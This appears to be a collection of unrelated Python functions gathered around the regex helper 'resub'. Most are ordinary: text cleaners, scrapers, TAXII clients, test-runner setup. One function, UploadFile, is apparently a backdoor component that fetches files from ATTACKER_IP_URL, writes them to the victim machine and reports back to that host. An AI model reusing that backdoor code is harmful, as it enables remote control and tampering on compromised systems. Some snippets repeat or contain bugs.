def _parse(self, string): """ Parses the given string and stores all information in the instance :param string: MTS config-like multi-line string containing the MO definition :type string: str|unicode """ # Get MO tag. e.g. [SIM VFB] try: self._tag = match(r'\[(.+)\]\s*\n', string).group(1) except AttributeError: raise MtsSectionError("The given string to be parsed does not specify a correct tag for the section.") # Get body body = resub(r'\\\s*\n\s*', '', resub(r'.+\]\s*\n', '', string)) sub = lambda value: resub(r'^"', '', resub(r'"$', '', value)) # Get parameters from within the body params_list = split(r'\s*\n\s*', body) for param in params_list: # If not is an empty line if not match(r'\s*$', param): # print param var, values = match(r'^(.+?)=(.+)$', param).groups() # Split values into a list values_list = split(r',\s*', values) # Store the parameter self._add_param(var, [sub(i) for i in values_list])
def fetch_url(queue, site, options): if options.output != "json": LOG.info("[Checking] " + get_fld(site["url"])) timeout = site["timeout"] if site["timeout"] != 0 else 10 implicit = site["implicit"] if site["implicit"] != 0 else 5 detections_count = 0 source = get(site["url"].replace("{username}", req["body"]["string"]), timeout=(implicit, timeout)).text text_only = "unavailable" title = "unavailable" temp_profile = { "found": 0, "link": "", "rate": "", "title": "", "text": "" } for detection in site["detections"]: temp_found = "false" if detection["type"] == "normal" and source != "" and detection[ "return"] == "true": detections_count += 1 if detection["string"].replace( "{username}", req["body"]["string"]).lower() in source.lower(): temp_found = "true" if detection["return"] == temp_found: temp_profile['found'] += 1 if temp_profile["found"] > 0 and detections_count != 0: with ignore_excpetion(): soup = BeautifulSoup(source, 'html.parser') [ tag.extract() for tag in soup( ['head', 'title', 'style', 'script', '[document]']) ] temp_profile["text"] = soup.getText() temp_profile["text"] = resub("\s\s+", " ", temp_profile["text"]) temp_profile["text"] = temp_profile["text"].replace( "\n", "").replace("\t", "").replace("\r", "").strip() with ignore_excpetion(): temp_profile["title"] = BeautifulSoup( source, 'html.parser').title.string temp_profile["title"] = resub("\s\s+", " ", temp_profile["title"]) temp_profile["title"] = temp_profile["title"].replace( "\n", "").replace("\t", "").replace("\r", "").strip() if temp_profile["text"] == "": temp_profile["text"] = "unavailable" if temp_profile["title"] == "": temp_profile["title"] = "unavailable" temp_profile["rate"] = "%" + str( round(((temp_profile["found"] / detections_count) * 100), 2)) temp_profile["link"] = site["url"].replace("{username}", req["body"]["string"]) copy_temp_profile = temp_profile.copy() queue.put([copy_temp_profile]) else: queue.put(None)
def IsValidTitle( txt, expresion=r"[^a-zA-Z\s]|pdf|read|more|download|back|click"\ +"|pages?|view|continue|reading|format|opens?|window|new"\ +"|media|release|size|read|full|story"\ +"|january|february|march|april|may|june|july|august|september"\ +"|october|november|december|jan|feb|mar|apr|jun|jul"\ +"|aug|sep|oct|nov|dec"): txt = resub(expresion, '', txt.lower()) txt = resub(" +", ' ', txt) if len(txt.split()) < 2: return False return True
def splice_convert(sequence, introns): from re import sub as resub #print(sequence) for intron in introns: exon = resub(intron,'',sequence) sequence = exon #print(exon) exon2=resub('T','U',exon) start_ind = exon2.find('AUG') if start_ind > 0: ex_out = exon2[start_ind:] else: ex_out = exon2 print("didn't find start codon") #print(ex_out) return ex_out
def write_new_ld_file(clusters, oldpath, newpath, threshold=1, **kwargs): ''' clusters is created by get_new_segs above oldpath and newpath are the locations of LearningData.txt files, old and new threshold defaults to 1 (inseparability measure) bigram clusters are sorted by their inseparability value; thus, if something that eventually becomes a trigram or tetragram has two-way parts in the current inseparability table, the bigram that is higher on the list will be replaced first. ''' clustlist = sorted([x for x in clusters if clusters[x] >= threshold], key=clusters.get, reverse=True) with open(oldpath, 'r', encoding='utf-8') as f: with open(newpath, 'w', encoding='utf-8') as out: for line in f: word = line.strip() if '\t' in line: word = line.split('\t')[0] rest = line.split('\t')[1:] for clust in clustlist: x = r'(^|\s)' + (clust) + r'(\s|$)' y = r'\1' + ''.join(clust.split(" ")) + r'\2' word = resub(x, y, word) if '\t' in line: out.write(f"word\trest") else: out.write(word + '\n') msg.env_render( message= f"\n\nWrote modified learning data to {newpath.split('simulation')[1]}", **kwargs)
def __init__(self, name, test_definition): self.name = name test_definition = deep_merge(default_config, test_definition) # quick shortcuts self.test_env = test_definition['environment'] self.test_meta = test_definition['meta'] self.test_commands = test_definition.get('test_commands', []) # take care of commands ... self.test_commands = _build_exec_array(self.test_commands) self.test_meta['test_before'] = \ _build_exec_array(self.test_meta.get('test_before', None)) self.test_meta['test_after'] = \ _build_exec_array(self.test_meta.get('test_after', None)) # okay. # let's keep all file references relative to the configuration # file. easy to remember. configfilepath = realpath(dirname(self.test_meta.get('_configfile', './dummy'))) # self.TEMPLATE / .TEMPLATE_NAME tmp = self.test_meta['docker_compose_template'] if not isabs(tmp): tmp = realpath(join(configfilepath, tmp)) self.template = tmp self.template_name = basename(self.template) # self.BASEDIR tmp = self.test_meta.get('test_basedir', configfilepath) if not isabs(tmp): tmp = realpath(join(configfilepath, tmp)) self.base_dir = tmp # self.SANITIZED_NAME, .TEST_DIR self.sanitized_name = resub("[^a-zA-Z0-9_]", "-", self.name) self.test_dir = dbg_tr_get_testdir(self.base_dir, self.sanitized_name) # extend SELF.TEST_ENV with TEST_DIR self.test_env['test_dir'] = self.test_dir # create SELF.COMMANDLINE self.commandline = copy.copy(default_commandline_start) for param in self.test_meta['docker_compose_params']: self.commandline.append(param) for key, val in self.test_env.items(): self.commandline.append("-e") self.commandline.append("%s=%s" % (key, val)) self.commandline.append("--rm") self.commandline.extend(copy.copy(default_commandline_end)) self.commandline.append(self.test_meta['test_service']) # create .STATE, .RESULT, .EXCEPTION, .REASON self.state = self.NOTRUN self.results = [] self.exception = None self.reason = None # log setup # NO LOGGING BEFORE HERE log_filename = join(self.base_dir, basename(self.test_dir)) + ".log" self.log = get_logger("t-%s" % self.name, filename=log_filename) # some debug output self.log.info("base commandline '%s'" % " ".join(self.commandline)) self.log.debug("test directory '%s'" % self.test_dir) self.log.debug("template path '%s'" % self.template) for key, val in self.test_env.items(): self.log.debug("env %s=%s" % (key, val))
def simplify_string(text): """Simplify a string to remove special characters, double spaces and use lower case. Parameters ---------- text: str string to clean Returns ------- str Examples -------- >>> text = ' (S . cerevisiáe )' >>> simplify_string(text) 's cerevisiae' """ text = text.lower() text = ' '.join([t for t in text.split()]) text = unidecode(text) text = resub(r"[^a-zA-Z0-9]+", ' ', text) text = ' '.join([t for t in text.split()]) #paranoia return text
def cleanTags(string): """Remove all html tags from the string. >>> cleanTags("<html><head><title>Hello</title><body>Test</body></html>") 'HelloTest' @type string: string @param string: the string to clean @rtype: string @return: the cleaned up string """ # http://lxml.de/api/lxml.html.clean.Cleaner-class.html htmlCleaned = Cleaner(allow_tags=[''], remove_unknown_tags=False, style=True ).clean_html(string or u"dummy") nice = htmlCleaned[5:-6] if htmlCleaned.startswith("<div>") else htmlCleaned return resub(r"\s\s+" , " ", resub(r"\s\s+" , " ", nice)).strip()
def __init__(self, name, compose_file, **kwargs): self.name = "{}".format(name if name else basename(compose_file)) self.sanitized_name = "intmaniac{}".format( resub("[^a-z0-9]", "", self.name.lower() + basename(compose_file).lower()) ) self.template = compose_file self.compose_wrapper = Compose(compose_file, self.sanitized_name, run_kwargs={'throw': True}) # extract "top level" parameters self.test_env = kwargs.pop('environment', {}) self.test_image = kwargs.pop('image') self.test_linked_services = kwargs.pop('links') self.test_commands = _build_exec_array(kwargs.pop('commands', [])) # save the rest self.meta = kwargs # state information self.test_state = self.NOTRUN self.test_results = [] self.exception = None self.reason = None # run information - this can only be set after the env is running self.cleanup_test_containers = [] self.run_containers = None # log setup self.log = get_logger("t-%s" % self.name) # some debug output self.log.debug("using template '%s'" % self.template) for key, val in self.test_env.items(): self.log.debug("env %s=%s" % (key, val))
def index(): if request.method == 'POST': # Create board details boardName = resub(r'[^-\w ]', '', request.form['boardName']) singleTokenBoardName = boardName.lower().replace(' ', '-') boardId = hashlib.sha1(boardName + datetime.now().__str__()).hexdigest() # Add board to database mongo.db.boards.insert_one({ 'boardId': boardId, 'boardName': boardName, 'singleTokenBoardName': singleTokenBoardName, 'maxNid': 0, 'notes': {} }) # # Send email to creator # send_email(request.form['email'], # 'Link for the scrumboard %s' % boardName, # creator_message % (boardName, singleTokenBoardName, boardId)) # Redirect user to their new board return redirect('/%s/%s' % (singleTokenBoardName, boardId)) # Render start page on GET return render_template('start.j2')
def sniff_dims(x): pattern = r"\#+dims\=" if rematch(pattern, x): y = resub(pattern, "", x) dims = list(map(int, y.split(","))) return dims else: return None
def FindPublishDate(dstr): for line in dstr[:300].split('\n\r\t'): line = resub("\W+", ' ', line).strip() pdate = ParseDateStr(line) if pdate: return pdate return ''
def create_replies_with_emojies(id, url): replies = list() try: uclient = ureq(url) tweet_html = uclient.read() uclient.close() tweet_soup = soup(tweet_html, 'html.parser') containers = tweet_soup.find_all('div', {'class': 'js-tweet-text-container'}) if len(containers) > 1: record = False for container in containers: if record: reply = container.p.text.strip() reply = reply.replace('\n', ' ') reply = reply.replace('\r', '') reply = resub(r'https?:\/\/[a-zA-Z0-9@:%._\+~#=\/]*[ ]*', ' ', reply) emojis_used = '' if not reply.strip(): continue emojis = container.find_all('img', {'class': 'Emoji Emoji--forText'}) for emoji in emojis: # reply+="<"+emoji['title']+"-"+emoji['alt']+">" emojis_used += " " + emoji['alt'] footer = container.parent.find_all( 'div', {'class': 'stream-item-footer'})[0] retweet_count = \ footer.find_all('div', {'class': 'ProfileTweet-action--retweet'})[0].find_all('span', { 'class': 'ProfileTweet-actionCountForPresentation'})[0].text.strip() liked_count = \ footer.find_all('div', {'class': 'ProfileTweet-action--favorite'})[0].find_all('span', { 'class': 'ProfileTweet-actionCountForPresentation'})[0].text.strip() # print(reply, retweet_count, liked_count) if not retweet_count: retweet_count = 0 if not liked_count: liked_count = 0 reply = reply.replace(',', ' ') reply_data = [ str(id), str(reply), emojis_used, str(retweet_count), str(liked_count) ] # print(reply_data) replies.append(reply_data) record = True except: t1, v1, trace = exc_info() print(t1) print(v1) print(trace) print('error occured with: ', url) replies.clear() return replies
def 英文字母_句子(): global 结果串; 读文件到列表(数据文件名); for 句子 in 数据列: s=resub(r'[^\w]','',句子) #空串 s="--".join([i for i in s]) 结果串=结果串+s+'\n'; 将数据写入文件(结果串,结果文件名); return True;
def 英文文本(): global 结果串; 读文件到列表(数据文件名); for 句子 in 数据列: s=resub(r'[^\w\s]',' ',句子) #空格 s="--".join(s.split()); #print(s); 结果串=结果串+s+'\n'; 将数据写入文件(结果串,结果文件名); return True;
def _write_system(self, system, inputf='input', config=None): from re import sub as resub if not config: config = self._config dirname = self._dirname filename = dirname + '/' + inputf polynomials = [p.factor() for p in system.polynomials] variables = system.variables parameters = system.parameters homvar = system.homvar num_polys = system.shape[0] options = config.keys() str_poly = [str(p) for p in polynomials] str_poly = [ resub(string=p, pattern=r'\*\*', repl='^') for p in str_poly ] str_vars = [str(v) for v in variables] str_pars = [str(p) for p in parameters] poly_names = ['f{0}'.format(i + 1) for i in range(num_polys)] polys_named = zip(poly_names, str_poly) poly_list = ','.join([f for f in poly_names]) vars_list = ','.join([v for v in str_vars]) pars_list = ','.join([p for p in str_pars]) fh = open(filename, 'w') # write the CONFIG section print('CONFIG', file=fh) for option in options: print('{0}:{1};'.format(option, config[option]), file=fh) print('END', file=fh) # write the INPUT section print('INPUT', file=fh) if parameters: print('parameter {0};'.format(pars_list), file=fh) if homvar: print('hom_variable_group {0};'.format(vars_list), file=fh) else: print('variable_group {0};'.format(vars_list), file=fh) print('function {0};'.format(poly_list), file=fh) for p in polys_named: # p is a key-value pair, e.g., ('f1', 'x^2 - 1') print('{0} = {1};'.format(p[0], p[1]), file=fh) print('END', file=fh) # finish up fh.close() return filename
def 英文字母_单词(): global 结果串; 读文件到列表(数据文件名); for 句子 in 数据列: s=resub(r'[^\w\s]',' ',句子) for i in s.split(): tmp="--".join([x for x in i]) #print(tmp) 结果串=结果串+tmp+'\n'; 将数据写入文件(结果串,结果文件名); return True;
def filter_file(self, connexion, mo): # extract the position of the matching pattern, then extract the # conversion string from the file convertion sequence groupdict = mo.groupdict() for group in groupdict: filename = groupdict[group] if not filename: continue filepattern = self.filepatterns[group] return resub(r'\{(\w+)\}', connexion._dynreplace, filepattern) raise TftpError(TftpError.NOT_DEF, 'Internal error, file matching pattern issue')
def replacing(what_to_replace: str, for_what: str, full_string: str) -> str: try: upper_list = [ True if letter.isupper() else False for letter in refindall( what_to_replace, full_string, flags=reIGNORECASE)[0] ] except IndexError: return "False" if all(upper_list): return resub(what_to_replace, for_what.upper(), full_string, flags=reIGNORECASE) replaced_word = ''.join(letter.upper() if is_upper else letter.lower() for letter, is_upper in zip_longest( for_what, upper_list, fillvalue=False)) return resub(what_to_replace, replaced_word, full_string, flags=reIGNORECASE)
def startscrapping(self,id,url): self.replies_found = False with open(self.replies_title,"a",encoding="utf-8") as replies: try: uclient = ureq(url) tweet_html = uclient.read() uclient.close() tweet_soup = soup(tweet_html,'html.parser') containers = tweet_soup.find_all('div', {'class': 'js-tweet-text-container'}) if len(containers) > 1: record = False for container in containers: if record: reply = container.p.text.strip() reply = reply.replace('\n',' ') reply = reply.replace('\r','') reply = resub(r'https?:\/\/[a-zA-Z0-9@:%._\+~#=\/]*[ ]*',' ',reply) if not reply.strip(): continue emoji_used = '' emojis = container.find_all('img',{'class':'Emoji Emoji--forText'}) for emoji in emojis: # reply+="<"+emoji['title']+"-"+emoji['alt']+">" emoji_used += emoji['alt'] + ' ' footer = container.parent.find_all('div', {'class': 'stream-item-footer'})[0] retweet_count = footer.find_all('div', {'class': 'ProfileTweet-action--retweet'})[0].find_all('span', { 'class': 'ProfileTweet-actionCountForPresentation'})[0].text.strip() liked_count = footer.find_all('div', {'class': 'ProfileTweet-action--favorite'})[0].find_all('span', { 'class': 'ProfileTweet-actionCountForPresentation'})[0].text.strip() # print(reply, retweet_count, liked_count) if not retweet_count: retweet_count = 0 if not liked_count: liked_count = 0 reply = reply.replace(',',' ') reply_data = str(id) + ',' + str(reply) +','+ emoji_used+ ',' + str(retweet_count) + ',' + str(liked_count) + '\n' # print(reply_data) replies.write(reply_data) self.replies_found = True record = True except: # t1, v1, trace = exc_info() # print(t1) # print(v1) # print(trace) print('error occured with: ',url) self.replies_found = False # scrap = Scrapper('https://t.co/36UkqQikKc','932115407783174145') # scrap.startscrapping()
def gen_filename(collection_name, format_part, date_string, extension): """ Creates a filename based on various properties of a Poll Request and Content Block :param collection_name: The collection name :param format_part: The format part (e.g., '_STIX_10_') :param date_string: A datestring :param extension: The file extension to use :return: A string containing the generated filename """ filename = ( collection_name.lstrip(".") + format_part + resub(r"[^a-zA-Z0-9]", "_", date_string) + extension ).translate(None, '/\\:*?"<>|') return filename
def gen_filename(collection_name, format_part, date_string, extension): """ Creates a filename based on various properties of a Poll Request and Content Block :param collection_name: The collection name :param format_part: The format part (e.g., '_STIX_10_') :param date_string: A datestring :param extension: The file extension to use :return: A string containing the generated filename """ filename = (collection_name.lstrip(".") + format_part + resub(r"[^a-zA-Z0-9]", "_", date_string) + extension).translate(None, '/\\:*?"<>|') return filename
def clean_data(my_string): ''' clean_data cleans my_string argument. It removes non-printable characters, specific csv characters and replaces empty chars in beginning and end. It also removes 'spliiter', specific string used for objects and relations. ''' rexes = ['^ *', ' *$', SPLITTER] char_to_remove = ["'", '"', ','] clean_s = '' for char in my_string: if char in printable and char not in char_to_remove: clean_s += char for regex in rexes: clean_s = resub(regex, '', clean_s) return clean_s
def ParseDateStr(dstr): if len(dstr) == 0: return '' dstr = ' ' + dstr.lower() + ' ' dstr = resub('[\W\d](th|st|nd|rd)\W', '', dstr).strip() try: dobjs = extract_dates(dstr, return_precision=True, debug=False) for o in dobjs: if o[1] == 'day': dobj = o[0].replace(tzinfo=None) if dobj <= cdate: return dobj except: return '' return ''
def get_files_prefixes(fs_path="./input", suffix=".csv$"): ''' get_files_prefixes will search in the path and returns all files that contains objects and relations for the graph ''' files_prefix = {} for _, _, files in walk(fs_path): for name in files: base_name = resub(suffix, '', name) name_parts = base_name.split(SPLITTER) if name_parts[0] == OBJECT_FILE_PREFIX or name_parts[ 0] == RELATIONS_FILE_PREFIX: if name_parts[0] not in files_prefix.keys(): files_prefix[name_parts[0]] = set() files_prefix[name_parts[0]].add(name) return files_prefix
def UploadFile(command): upload = "" fileContentPath = "" try: upload, fileContentPath = command.split('::') except Exception as e: httpReq(ATTACKER_IP_URL, data="file=" + quote_plus('\n [ERROR] Invalid command syntax.\n')) return try: fileBytes = httpReq(ATTACKER_IP_URL + '/uploadRequest', data='file=' + quote_plus(fileContentPath.replace('"', '')), returnBytes=True) fName = httpReq(ATTACKER_IP_URL + '/uploadRequestFileName', data='file=' + quote_plus(fileContentPath.replace('"', ''))).encode() altchars = b'+/' fName = resub(rb'[^a-zA-Z0-9%s]+' % altchars, b'', fName) missing_padding = len(fName) % 4 if missing_padding: fName += b'=' * (4 - missing_padding) fName = b64decode(fName, altchars) fName = fName.decode() try: with open(fName, 'wb') as f: f.write(fileBytes) httpReq(ATTACKER_IP_URL, data="file=" + quote_plus('\n [INFO] Upload successful.\n')) except Exception as e: httpReq( ATTACKER_IP_URL, data="file=" + quote_plus( '\n [ERROR] An error occured when trying to upload.\n')) pass except Exception as e: httpReq(ATTACKER_IP_URL, data="file=" + quote_plus(str(e.args)))
def do_comment(request, dailyphoto_id): dp_obj = get_object_or_404(DailyPhoto, id=dailyphoto_id) comment = request.POST.get('do_comment', '') comment = comment.strip() # Save the comment in DB. print "Comment Text: ", comment list_of_users_in_comment = [resub(r'\[|\]', r'', name) for name in findall(r'\[[a-z0-9]+\]', comment)] for nuser in list_of_users_in_comment: print nuser if comment: Comments.objects.create(user=request.user, dailyphoto=get_object_or_404(DailyPhoto, id=dailyphoto_id), comment=comment, ) redis_obj = StrictRedis(db=9) redis_obj.publish("notifications:%s" % request.user.username, 1) return HttpResponseRedirect( reverse('users.views.browse_daily_photo_single', args=(str(dp_obj.user.username), dp_obj.key)))
def handle_response(self, response, args): super(PollClient11Script, self).handle_response(response, args) if response.message_type == tm11.MSG_POLL_RESPONSE: if response.more: print "This response has More=True, to request additional parts, use the following command:" print " fulfillment_client --collection %s --result-id %s --result-part-number %s\r\n" % \ (response.collection_name, response.result_id, response.result_part_number + 1) for cb in response.content_blocks: if cb.content_binding.binding_id == t.CB_STIX_XML_10: format = '_STIX10_' ext = '.xml' elif cb.content_binding.binding_id == t.CB_STIX_XML_101: format = '_STIX101_' ext = '.xml' elif cb.content_binding.binding_id == t.CB_STIX_XML_11: format = '_STIX11_' ext = '.xml' elif cb.content_binding.binding_id == t.CB_STIX_XML_111: format = '_STIX111_' ext = '.xml' else: # Format and extension are unknown format = '' ext = '' if cb.timestamp_label: date_string = 't' + cb.timestamp_label.isoformat() else: date_string = 's' + datetime.datetime.now().isoformat() filename = ( response.collection_name.lstrip(".") + format + resub(r"[^a-zA-Z0-9]", "_", date_string) + ext ).translate(None, '/\\:*?"<>|') filename = os.path.join(args.dest_dir, filename) f = open(filename, 'w') f.write(cb.content) f.flush() f.close() print "Wrote Content Block to %s" % filename
def image_resize(image_path, new_size, maintain_ratio=False): save_dir = path.dirname(image_path) new_filename = '%s_%s' % (path.basename(image_path), new_size) resize_command = ['convert', "%s" % image_path] if not maintain_ratio: comm_args = '-resize "%s^" -gravity center -extent %s "%s/%s"' \ % (new_size, new_size, save_dir, new_filename) else: image_size = check_output(['identify', "%s" % image_path]) image_size = resub(r'.* ([0-9]+x[0-9]+) .*\n', r'\1', image_size) old_x, old_y = image_size.split('x') new_x, new_y = new_size.split('x') new_y = int((float(old_y) / float(old_x)) * float(new_x)) new_size = "%sx%d" % (new_x, new_y) new_filename = '%s_%s' % (path.basename(image_path), new_x) comm_args = '-resize %s^ -gravity center -extent %s "%s/%s"' \ % (new_size, new_size, save_dir, new_filename) resize_command.extend(shlex_split(comm_args)) call(resize_command)
def build_mac_acl(cls, entry: str) -> Tuple[int, int]: parts = entry.split('/', 1) values = [] bitcount = cls.ACCESS_LOCAL['mac'] maxval = (1 << bitcount) - 1 for mask, part in enumerate(parts): try: if mask: value = maxval & ~((1 << int(part)) - 1) else: part = resub('[-:]', '', part) value = int(part, 16) value <<= bitcount - len(part) * 4 if not 0 <= value <= maxval: raise ValueError() values.append(value) except Exception: raise ValueError('Invalid ACL value: %s' % entry) if len(values) < 2: values.append(maxval) return tuple(values)
def _clean_text(self, text_series): """ Cleans a column of text. Removes all special characters, websites, mentions etc. Parameters ---------- text_series: Pandas.Series Returns ------- Pandas.Series Cleaned text """ from re import sub as resub text_series = text_series.apply( lambda x: resub(r"[^A-Za-z0-9 ]+|(\w+:\/\/\S+)|htt", " ", x )).str.strip().str.lower() return text_series
def __init__(self, name, compose_file, **kwargs): self.name = "{}".format(name if name else basename(compose_file)) self.sanitized_name = "intmaniac{}".format( resub("[^a-z0-9]", "", self.name.lower() + basename(compose_file).lower()) ) self.template = compose_file self.compose_wrapper = Compose(compose_file, self.sanitized_name, run_kwargs={'throw': True}) # extract "top level" parameters self.test_env = kwargs.pop('environment', {}) self.test_image = kwargs.pop('image') self.test_linked_services = kwargs.pop('links') self.test_commands = _build_exec_array(kwargs.pop('commands', [])) # meta_information self.pull = kwargs.pop('pull', True) self.pre = kwargs.pop('pre', None) self.post = kwargs.pop('post', None) self.allow_failure = kwargs.pop('allow_failure', False) self.volumes = self.format_volume_mapping(kwargs.pop('volumes', [])) # save the rest (run-arguments for docker.container.create()) self.meta = kwargs # state information self.test_state = self.NOTRUN self.test_results = [] self.exception = None self.reason = None # run information - this can only be set after the env is running self.cleanup_test_containers = [] self.run_containers = None # log setup self.log = get_logger("t-%s" % self.name) # some debug output self.log.debug("using template '%s'" % self.template) for key, val in self.test_env.items(): self.log.debug("env %s=%s" % (key, val))
def do_comment(request, dailyphoto_id): dp_obj = get_object_or_404(DailyPhoto, id=dailyphoto_id) comment = request.POST.get('do_comment', '') comment = comment.strip() # Save the comment in DB. print "Comment Text: ", comment list_of_users_in_comment = [ resub(r'\[|\]', r'', name) for name in findall(r'\[[a-z0-9]+\]', comment) ] for nuser in list_of_users_in_comment: print nuser if comment: Comments.objects.create( user=request.user, dailyphoto=get_object_or_404(DailyPhoto, id=dailyphoto_id), comment=comment, ) redis_obj = StrictRedis(db=9) redis_obj.publish("notifications:%s" % request.user.username, 1) return HttpResponseRedirect( reverse('users.views.browse_daily_photo_single', args=(str(dp_obj.user.username), dp_obj.key)))
def fetch_url(site, username, options): LOG.info("[Checking] " + get_fld(site["url"])) timeout = site["timeout"] if site["timeout"] != 0 else 10 implicit = site["implicit"] if site["implicit"] != 0 else 5 detections_count = 0 source = "" with suppress(Exception): source = get(site["url"].replace("{username}", username), timeout=(implicit, timeout)).text text_only = "unavailable" title = "unavailable" detection_level = { "extreme": { "fast": "normal", "slow": "normal,advanced,ocr", "detections": "true", "count": 1, "found": 2 }, "high": { "fast": "normal", "slow": "normal,advanced,ocr", "detections": "true,false", "count": 2, "found": 1 }, "current": "high" } temp_profile = { "found": 0, "image": "", "link": "", "rate": "", "title": "", "language": "", "text": "", "type": "", "good": "", "method": "" } for detection in site["detections"]: temp_found = "false" if detection['type'] in detection_level[ detection_level['current']]['fast'] and source != "": detections_count += 1 if detection["string"].replace( "{username}", username).lower() in source.lower(): temp_found = "true" if detection["return"] == temp_found: temp_profile['found'] += 1 if temp_profile['found'] >= detection_level[detection_level[ 'current']]['found'] and detections_count >= detection_level[ detection_level['current']]['count']: temp_profile['good'] = "true" with suppress(Exception): soup = BeautifulSoup(source, 'html.parser') [ tag.extract() for tag in soup( ['head', 'title', 'style', 'script', '[document]']) ] temp_profile["text"] = soup.getText() temp_profile["text"] = resub("\s\s+", " ", temp_profile["text"]) temp_profile["text"] = temp_profile["text"].replace( "\n", "").replace("\t", "").replace("\r", "").strip() with suppress(Exception): temp_profile["language"] = get_language_by_parsing(source) if temp_profile["language"] == "unavailable": temp_profile["language"] = get_language_by_guessing( temp_profile["text"]) with suppress(Exception): temp_profile["title"] = BeautifulSoup(source, 'html.parser').title.string temp_profile["title"] = resub("\s\s+", " ", temp_profile["title"]) temp_profile["title"] = temp_profile["title"].replace( "\n", "").replace("\t", "").replace("\r", "").strip() if temp_profile["text"] == "": temp_profile["text"] = "unavailable" if temp_profile["title"] == "": temp_profile["title"] = "unavailable" with suppress(Exception): temp_profile["rate"] = "%" + str( round(((temp_profile["found"] / detections_count) * 100), 2)) temp_profile["link"] = site["url"].replace("{username}", req["body"]["string"]) temp_profile["type"] = site["type"] if "FindUserProfilesFast" in options and "GetUserProfilesFast" not in options: temp_profile['method'] = "find" elif "GetUserProfilesFast" in options and "FindUserProfilesFast" not in options: temp_profile['method'] = "get" elif "FindUserProfilesFast" in options and "GetUserProfilesFast" in options: temp_profile['method'] = "all" copy_temp_profile = temp_profile.copy() return copy_temp_profile
def stripComment(self, text): """ Regex substitutions for comments; removes comment characters. """ subText = lambda value, regex:resub(regex, '', value) for text in ifilter(unicode.strip, text.split('\n')): yield reduce(subText, self.commentSubs, text)
def stripComment(self, text): """ Regex substitutions for comments; removes comment characters. """ subText = lambda value, regex: resub(regex, '', value) for text in ifilter(unicode.strip, text.split('\n')): yield reduce(subText, self.commentSubs, text)
def str2tupleunit(_str: str) -> tuple: """Convert measurement units from string to tuple""" _num = resub('([0-9.]+)([ _,]*)([A-Za-z/]+)', r'\1', _str) _unit = resub('([0-9.]+)([ _,]*)([A-Za-z/]+)', r'\3', _str) return (_num, _unit)
def one_line_xml(string): string = "".join(string.splitlines()) string = resub("[>]\s+[<]", "><", string) string = string.strip() return string
def main(): parser = scripts.get_base_parser("Poll Query Client", path="/services/poll/") parser.add_argument("--collection", dest="collection", default="default_queryable", help="Data Collection to poll. Defaults to 'default_queryable'.") parser.add_argument("--allow-asynch", dest="allow_asynch", default=True, help="Indicate whether or not the client support Asynchronous Polling. Defaults to True") parser.add_argument("--tev", dest="tev", default=t.CB_STIX_XML_111, help="Indicate which Targeting Expression Vocabulary is being used. Defaults to STIX XML 1.1.1") parser.add_argument("--target", dest="target", default="**/@id", help="The targeting expression to use. Defaults to **/@id (Any id, anywhere).") parser.add_argument("--rel", dest="relationship", default="equals", help="The relationship to use (e.g., equals). Defaults to equals.") parser.add_argument("--cm", dest="capability_module", default=None, help="The capability module being used. If not specified, the script will attempt to infer the correct capability module") # Parameters - optional depending on what relationship is chosen parser.add_argument("--value", dest=tdq.P_VALUE, default=None, help="The value to look for. Required (or not) and allowed values depend on the relationship.") parser.add_argument("--match-type", dest=tdq.P_MATCH_TYPE, default=None, choices=['case_sensitive_string', 'case_insensitive_string', 'number'], help="The match type. Required (or not) and allowed values depend on the relationship.") parser.add_argument("--case-sensitive", dest=tdq.P_CASE_SENSITIVE, default=None, choices=[True, False], help="Whether the match is case sensitive. Required (or not) and allowed values depend on the relationship.") args = parser.parse_args() capability_module = None relationship = None for cm_id, cm in tdq.capability_modules.iteritems(): relationship = cm.relationships.get(args.relationship.lower(), None) if args.capability_module: # The user specified a value - try to match on that if cm_id == args.capability_module: if not relationship: # If the specified relationship is not in the capability module, that's an error raise ValueError('Relationship (%s) not found in capability module (%s). Valid relationships are: %s' % (args.relationship, args.capability_module, cm.relationships.keys())) capability_module = cm elif relationship: # User did not specify a value for capability_module, attempt to infer capability_module = cm if capability_module: break if not capability_module: raise ValueError("Unable to map relationship to Capability Module: %s" % args.relationship) # Make sure all required params are set and # no unused params are set tdq_params = {} for parameter in tdq.P_NAMES: param_obj = relationship.parameters.get(parameter, None) # Will either be a parameter object or None param_value = getattr(args, parameter) # Will either be a value or None if param_obj and not param_value: raise ValueError('The parameter "%s" is needed and was not specified. Specify using --%s <value>' % (parameter, parameter.replace('_', '-'))) if param_value and not param_obj: raise ValueError('The parameter %s was specified and is not needed' % parameter) if param_obj: param_obj.verify(param_value) tdq_params[parameter] = param_value test = tdq.Test(capability_id=capability_module.capability_module_id, relationship=relationship.name, parameters=tdq_params) criterion = tdq.Criterion(target=args.target, test=test) criteria = tdq.Criteria(operator=tdq.OP_AND, criterion=[criterion]) q = tdq.DefaultQuery(args.tev, criteria) poll_req = tm11.PollRequest(message_id=tm11.generate_message_id(), collection_name=args.collection, poll_parameters=tm11.PollRequest.PollParameters(allow_asynch=args.allow_asynch, query=q)) print "Request:\n" if args.xml_output is False: print poll_req.to_text() else: print poll_req.to_xml(pretty_print=True) client = scripts.create_client(args) resp = client.call_taxii_service2(args.host, args.path, t.VID_TAXII_XML_11, poll_req.to_xml(pretty_print=True), args.port) r = t.get_message_from_http_response(resp, '0') print "Response:\n" if args.xml_output is False: print r.to_text() else: print r.to_xml(pretty_print=True) if r.message_type == tm11.MSG_POLL_RESPONSE: for cb in r.content_blocks: if cb.content_binding.binding_id == t.CB_STIX_XML_10: format = '_STIX10_' ext = '.xml' elif cb.content_binding.binding_id == t.CB_STIX_XML_101: format = '_STIX101_' ext = '.xml' elif cb.content_binding.binding_id == t.CB_STIX_XML_11: format = '_STIX11_' ext = '.xml' elif cb.content_binding.binding_id == t.CB_STIX_XML_111: format = '_STIX111_' ext = '.xml' else: # Format and extension are unknown format = '' ext = '' if cb.timestamp_label: date_string = 't' + cb.timestamp_label.isoformat() else: date_string = 's' + datetime.datetime.now().isoformat() filename = ( response.collection_name.lstrip(".") + format + resub(r"[^a-zA-Z0-9]", "_", date_string) + ext ).translate(None, '/\\:*?"<>|') filename = os.path.join(args.dest_dir, filename) f = open(filename, 'w') f.write(cb.content) f.flush() f.close() print "Wrote Content Block to %s" % filename
